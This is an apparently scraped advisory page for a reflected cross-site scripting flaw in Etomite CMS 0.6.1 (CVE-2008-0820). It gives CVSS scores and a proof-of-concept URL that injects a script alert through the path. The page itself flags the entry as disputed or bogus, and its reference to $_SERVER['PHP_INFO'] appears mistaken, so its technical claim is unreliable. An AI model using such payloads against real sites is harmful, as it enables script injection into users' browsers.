etomite xss

WARNING! Fake news / Disputed / BOGUS

2008.02.19

Credit: Michael Brooks

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2008-0820

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Homepage: http://www.etomite.com/

Tested Version: 0.6.1 Final

Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%
22test%22)%3C/script%3E/fill

This is a flaw because $_SERVER['PHP_INFO'] is being  trusted.

$_SERVER['PHP_INFO'] will contain this value when the exploit url is used:

/index.php/"><script>alert("test")</script>/fill

/fill is removed.

Trust no one.

Michael Brooks

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

etomite xss

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

etomite xss

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.